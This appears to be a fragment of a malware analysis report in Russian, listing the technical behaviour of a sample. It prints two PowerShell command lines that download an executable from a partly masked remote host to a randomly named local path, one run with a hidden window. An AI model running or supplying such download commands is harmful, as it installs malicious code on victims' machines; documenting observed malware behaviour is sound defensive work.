Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $u='http://re##h.com/kpxa.exe';$o='C:\xSXfVBK\KINkryd\ppFJMEc.exe';Invoke-WebRequest -Uri $u -OutFile $o
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $u='http://re##h.com/kpxa.exe';$o='C:\xSXfVBK\KINkryd\ppFJMEc.exe';Invoke-WebRequest -Uri $u -OutFile $o' (со скрытым окном)